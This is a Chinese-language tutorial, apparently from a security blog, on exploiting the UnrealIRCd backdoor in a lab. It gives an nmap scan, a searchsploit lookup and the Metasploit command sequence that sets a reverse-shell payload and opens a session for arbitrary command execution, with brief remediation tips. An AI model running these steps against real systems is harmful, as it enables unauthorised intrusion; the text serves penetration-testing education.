当前位置:网站首页>6-25漏洞利用-irc后门利用
6-25漏洞利用-irc后门利用
2022-08-02 00:44:00 【山兔1】
irc介绍
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称),用来区分不同用户。
默认情况下,irc服务器运行在6667端口。
探测目标irc
使用nmap -sV -p 6667 IP地址 探测目标irc版本信息
nmap -sV -p 6667 192.168.42.137
可以看到,很快探测出目标版本信息
msf利用irc后门
使用searchsploit查找可以利用的POC
searchsploit UnrealIRCd
可以查看到,当前软件是否存在问题,我们在这里选择Backdoor Command Execution(Metasploit),进行利用
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit
利用msf中对于irc后门连接的模块,连接shell。
可以看到,探测完成,建立了session,我们可以在这里执行任意命令
修复防御
1、升级软件版本
2、更换其他软件
边栏推荐
- datagrip连接mysql数据库
- Pytorch seq2seq model architecture to achieve English translation tasks
- Can't connect to MySQL server on 'localhost3306' (10061) Simple and clear solution
- IDEA版Postman插件Restful Fast Request,细节到位,功能好用
- 安全(2)
- 期货开户手续费的秘密成了透明
- Reflex WMS中阶系列6:对一个装货重复run pick会有什么后果?
- GO开发环境配置
- Flink_CDC搭建及简单使用
- 技术分享 | 接口测试中如何使用Json 来进行数据交互 ?
猜你喜欢
随机推荐
Day11 Shell scripting basics
【软件工程之美 - 专栏笔记】34 | 账号密码泄露成灾,应该怎样预防?
安全(1)
Go 1.18 的那些事——工作区、模糊测试、泛型
What is Low-Code?What scenarios is low code suitable for?
GateWay实现负载均衡
datax与datax-web安装部署
Flink_CDC搭建及简单使用
swing的Jlist列表滚动条以及增加元素的问题
html+css+php+mysql实现注册+登录+修改密码(附完整代码)
Realize deletion - a specified letter in a string, such as: the string "abcd", delete the "a" letter in it, the remaining "bcd", you can also pass multiple characters to be deleted, and pass "ab" can
CVPR 2022 | SharpContour:一种基于轮廓变形 实现高效准确实例分割的边缘细化方法
Can't connect to MySQL server on 'localhost3306' (10061) Simple and clear solution
ALCCIKERS Shane 20191114
fastjson详解
flv.js解析与使用
H5页面调用微信授权获取code
feign异常传递的两种方式 fallbackfactory和全局处理 获取服务端自定义异常
内部类、异常简单介绍(第十天)
管理基础知识19